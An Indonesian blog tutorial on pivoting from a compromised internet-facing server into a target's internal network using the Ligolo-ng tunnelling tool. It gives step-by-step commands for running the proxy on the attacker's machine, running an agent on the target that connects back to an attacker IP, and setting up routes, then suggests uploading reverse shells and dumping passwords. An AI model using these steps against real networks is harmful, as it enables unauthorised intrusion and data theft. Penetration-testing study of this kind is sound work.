Cara Pivoting menggunakan Ligolo (eksternal ke internal)
Pivoting adalah, bergerak dari jaringan target yang terhubung ke jaringan internet (eksternal) menuju ke jaringan internal atau bahkan workstation, melalui foothold atau mesin yang sudah kita miliki aksesnya,
Singkatnya setelah dapat akses di www-data, trus naik ke root atau user admin, lalu kamu pindah ke jaringan internal target di mesin tersebut.
Misal ada web server yang terhubung ke internet, tetapi web server tersebut juga terhubung ke jaringan internal yang bisa diakses oleh komputer karyawan atau ada server lain yang terhubung seperti aplikasi server dan lainnya.
Ada beberapa cara tekhnik pivoting, diantaranya menggunakan SSH -D, rpivot, chisel, dan ligolo.
Kali ini kita akan membahas bagaimana cara menggunakan ligolo untuk tunelling / pivoting ke jaringan internal target.
Berikut tahapan dan prosesnya:
1. TAHAP-TAHAP MENGGUNAKAN LIGOLO:
- Download file proxy untuk attacker dan file agent untuk target di: https://github.com/nicocha30/ligolo-ng/releases
sesuaikan dengan jenis OS kalian.
- Di Mesin Attacker:
- extract file proxy => tar -xzvf namafile.tar.gz
- kasih permission => chmod +x proxy
- eksekusi file nya =>sudo ./proxy -selfcert -laddr 0.0.0.0:11601
- Di Mesin Target:
- extract file agent => tar -xzvf agent.tar.gz
- kasih permission => chmod +x agent
- jalankan agent => ./agent -connect 10.10.200.60:11601 -ignore-cert
notes (jangan lupa import file nya)
dan
- Di interaktif ligolo :
- => session
- => session 1
- Di mesin attacker:
- Buat interface tun ligolo
- => sudo ip tuntap add mode tun ligolo
- => sudo ip link set ligolo up
- Di interaktif ligolo:
- mengaktifkan tunelling interface ligolo => start --tun ligolo
- DI Mesin Attacker:
- hapus 192.68.98.0/24 dari tun 0 interface => sudo ip route del 192.168.98.0/24 dev tun0
- up ligolo interface => sudo ip link set ligolo up
- tambahkan route ke subnet internal target => sudo ip route add 192.168.98.0/24 dev ligolo
- Test koneksi dengan ping => ping 192.168.98.2
Dari mesin attacker, kamu bisa menggunakan berbagai comand langsung ke internal target, seolah aksi tersebut dilakukan oleh mesin foothold yang kita dapatkan di awal.
Contoh cara menggunakannya:
Wow, kita dapat akses ke jaringan internal, dengan menjalankan comand atau tools langsung dari mesin attacker. Dengan pivoting ini kamu bisa melakukan berbagai tekhnik, seperti mengupload payload / reverse shell, dump password, dan mencari data penting!!


Komentar
Posting Komentar